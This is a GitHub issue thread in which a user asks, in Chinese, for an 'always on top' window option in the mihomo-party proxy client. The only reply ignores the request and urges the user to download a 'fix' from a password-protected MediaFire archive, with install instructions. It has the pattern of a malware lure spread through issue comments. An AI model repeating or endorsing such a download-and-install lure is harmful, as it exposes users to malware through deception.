### ISSUE TITLE
[Feature] 能否加入将应用置顶的功能？

### ISSUE THREAD

**Issue by SingularityWu** [pompurin404/mihomo-party#96]
### Verify steps

- [x] 我已在标题简短的描述了我所需的功能
- [x] 我已在[Issue Tracker](./?q=is%3Aissue)中寻找过,但未找到我所需的功能
- [x] 这是向GUI程序提出的功能请求,而不是内核程序
- [x] 我未在最新的测试版本找到我所需的功能

### 操作系统

Windows

### 描述

后期是否可以加入应用置顶功能，这样查看“连接”情况的时候不需要来回切换应用

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
